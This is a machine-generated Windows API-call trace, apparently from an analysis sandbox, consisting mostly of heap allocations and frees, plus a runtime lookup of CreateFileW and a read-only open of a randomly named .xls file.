RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0079.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0079.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0079.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0079.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0079.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0079.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0079.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0079.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0079.381] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0079.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0079.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0079.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0079.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0079.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0079.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0079.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0079.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0079.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0079.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0079.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0079.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0079.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0079.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0079.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0079.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0079.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0079.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0079.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0079.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0079.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0079.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0079.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0079.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0079.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0079.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0079.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0079.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0079.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0079.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0079.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0079.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0079.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0079.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0079.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0079.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0079.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0079.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0079.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0079.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0079.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0079.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0079.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0079.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0079.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0079.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0079.384] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0079.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0079.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0079.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0079.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0079.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0079.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0079.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0079.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0079.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0079.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0079.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0079.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0079.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0079.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0079.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0079.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0079.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0079.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0079.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0079.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0079.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0079.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0079.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0079.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0079.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0079.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0079.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0079.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0079.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0079.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0079.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0079.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0079.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0079.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0079.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0079.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0079.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0079.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0079.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0079.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0079.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0079.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0079.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0079.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0079.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0079.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0079.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0079.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0079.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0079.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0079.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.386] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0079.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0079.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0079.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac70 [0079.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cac70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0079.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0079.387] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0079.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0079.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0079.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0079.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0079.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0079.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0079.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0079.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0079.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0079.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0079.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0079.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0079.388] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\IVMtcxmHJDptt31P9OCD.xls" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\ivmtcxmhjdptt31p9ocd.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0079.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0079.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eada8 [0079.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0079.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0079.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0079.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0079.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0079.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0079.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0079.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0079.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0079.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4618 [0079.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0079.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0079.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0079.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0079.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0079.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0079.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0079.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0079.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0079.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0079.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0079.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0079.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0079.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0079.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.389] FreeLibrary (hLibModule=0x772d0000) returned 1 [0079.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0079.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0079.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0079.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0079.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0079.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 